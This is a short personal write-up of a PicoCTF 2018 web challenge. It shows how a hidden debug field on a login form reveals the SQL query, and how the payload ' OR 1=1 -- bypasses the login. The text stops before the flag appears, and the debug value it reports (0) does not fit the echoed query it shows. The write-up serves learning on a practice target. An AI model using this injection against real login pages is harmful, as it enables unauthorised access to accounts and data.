This is one of my writeups for PicoCTF 2018
There is a website running at http://2018shell3.picoctf.com:11899. Do you think you can log us in? Try to see if you can login!
- There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?
The hint here seems to point at an SQL injection, but let's browse around the app. We have access to three views :
- The index, that has nothing interesting
- A "support" page
- An "admin login page"
The support page contains another clue pointing at an SQL injection :
Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error
With that in mind, we can look at the login page. Inspecting the source, we see
there's a hidden
debug field :
<form action="login.php" method="POST"> <fieldset> <div class="form-group"> <label for="username">Username:</label> <input type="text" id="username" name="username" class="form-control"> </div> <div class="form-group"> <label for="password">Password:</label> <div class="controls"> <input type="password" id="password" name="password" class="form-control"> </div> </div> <input type="hidden" name="debug" value="0"> <div class="form-actions"> <input type="submit" value="Login" class="btn btn-primary"> </div> </fieldset> </form>
To confirm that, I sent a request with a random username and no password (Note:
I used Burp suite's proxy and repeater to manipulate the requests). With
debug=0, we get :
<pre>username: iodbh password: SQL query: SELECT * FROM users WHERE name='aaa' AND password='' </pre><h1>Login failed.</h1>
Great, no we know how to construct the SQL query.We can to return all rows
with a username or
' OR 1=1 -- and an empty password, which will end up
constructing the following request :
SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''
Since anything after
-- is ignored, the effective query is :
SELECT * FROM users WHERE name='' OR 1=1
If we try this payload, we get the flag in the response :